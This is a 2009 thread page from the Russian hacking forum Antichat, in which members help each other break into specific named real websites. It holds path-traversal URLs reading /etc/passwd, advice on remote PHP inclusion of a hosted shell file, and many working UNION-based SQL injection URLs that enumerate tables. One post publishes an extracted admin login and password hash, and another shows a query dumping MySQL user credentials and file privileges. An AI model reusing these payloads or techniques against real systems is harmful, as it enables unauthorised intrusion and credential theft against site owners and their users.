ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5201  
Старый 31.01.2009, 08:43
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от Mirella  
http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/admin.php
http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world

что можно с этим добром сделать ? как дальше пройти?
https://forum.antichat.ru/thread49775.html
http://forum.antichat.ru/showthread.php?p=400021

Последний раз редактировалось xcedz; 31.01.2009 в 08:46..
 
Ответить с цитированием

  #5202  
Старый 31.01.2009, 11:16
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от Mirella  
http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/admin.php
http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world

что можно с этим добром сделать ? как дальше пройти?
Чего-то я там не вижу php-include. Может прикрыли уже? Но как вариант было найти реальный путь, и инклюдить файлы, начиная с index'a и дойдя так до БД слогами, но надо, что бы там было читалка. Можно было провести удаленный php-include, т.е. file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!
 
Ответить с цитированием

  #5203  
Старый 31.01.2009, 12:04
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--

Помогите плиз, вобщем вывел таблицы через Group_concat но они не все выводяться, а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
 
Ответить с цитированием

  #5204  
Старый 31.01.2009, 12:32
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

Assembler,
Цитата:
http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%2001,concat(username,0x3a,passw ord)username%20from%20mybb_users+limit+0,1--
 
Ответить с цитированием

  #5205  
Старый 31.01.2009, 12:33
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Assembler  
вывел таблицы через Group_concat но они не все выводяться,
А где написано, что они должны все выводиться?
Цитата:
а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
Да, иногда ошибку даёт, не в лимите дело, он и без него иногда ничего не выводит. Но в любом случае вывести можно, там 346 таблиц, несколько раз делай запрос , до вывода, других способов всё равно нет
 
Ответить с цитированием

  #5206  
Старый 31.01.2009, 12:36
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от Assembler  
http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--

Помогите плиз, вобщем вывел таблицы через Group_concat но они не все выводяться, а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
Зачем через group_concat? Делай просто через limit по одному.
http://www.rapidshare.ru/909903 - вот тебе список всех таблиц! Самые полезные: user и mybb_users
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x75736572++-- это колонки таблицы user
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x6d7962625f7573657273 ++-- колонки таблицы mybb_users
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,concat_ws(0x3a,uid,username,passw ord)+from+mybb_users--
1:Admin:5d3fd0aa8e2c38d1b632a1a2d09f46dd - вот логин и пароль из таблицы mybb_users

Последний раз редактировалось Tigger; 31.01.2009 в 13:00..
 
Ответить с цитированием

  #5207  
Старый 31.01.2009, 12:40
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от jokester  
А где написано, что они должны все выводиться?

Да, иногда ошибку даёт, не в лимите дело, он и без него иногда ничего не выводит. Но в любом случае вывести можно, там 346 таблиц, несколько раз делай запрос , до вывода, других способов всё равно нет
https://forum.antichat.ru/showpost.php?p=1075672&postcount=4940

Есть еще знак > и < и т.д. Лимит не везде доступен при скулях
 
Ответить с цитированием

  #5208  
Старый 31.01.2009, 13:10
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Pashkela Не понял. Ты отвечал на какой-то мой вопрос?
Если на этот --> А где написано, что они должны все выводиться?
То ответа по ссылке на нашол, да и не стоит беспокоится, вопрос риторический
Насчёт лимита:
Там работает лимит, просто скрипт глючит иногда.
 
Ответить с цитированием

  #5209  
Старый 31.01.2009, 14:23
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

как это у вас проходят конструкции group_concat+limit, я думал функции с аргументами выборки не дружат с лимитом,
на вашем же примере если задавать начальные позиции <>0
Цитата:
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,count(table_name)+from+informatio n_schema.tables+limit+1,1--
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,group_concat(table_name)+from+inf ormation_schema.tables+limit+1,1--
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,ascii(table_name)+from+informatio n_schema.tables+limit+1,1--
вот ещё 1 пример, вывод есть:
Цитата:
http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+limit+0,1--+
вывода нет
Цитата:
http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+limit+1,1--+
и чем вас не устраивает вариант group_concat(user order by 'user') where user>'user' ? '(
 
Ответить с цитированием

  #5210  
Старый 31.01.2009, 14:45
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от l1ght  
как это у вас проходят конструкции group_concat+limit, я думал функции с аргументами выборки не дружат с лимитом
Какой ещё group_concat+limit? Лично я говорил про лимит отдельно, груп конкат отдельно. Возможно не достаточно понятно выразился, извиняйте.
Цитата:
Сообщение от l1ght  
и чем вас не устраивает вариант group_concat(user order by 'user') where user>'user' ? '(
Я тебе уже говорил, что подзапросы и условия-- это не наш метод, нам нужна кнопка "Залить шелл"

===========================
add: кстати о проститутках, их можно группировать Например так(разбиваем по базам):

http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+group+by+ta ble_schema+limit+2,1--+

При таком раскладе лимит ,разумеется, работает отлично

Ну а не на information_schema, тоже можно групировать по полю, админов там всех вывести и т.д
Типо:
-1+union+select+group_concat(concat_ws(0x2f,user,pa ssword,file_priv)),2,3,4,5,6+from+mysql.user+group +by+file_priv+limit+1,1

Ну и т.д., тоже конечно не панацея, но как вариант покатит

Последний раз редактировалось jokester; 31.01.2009 в 15:40..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ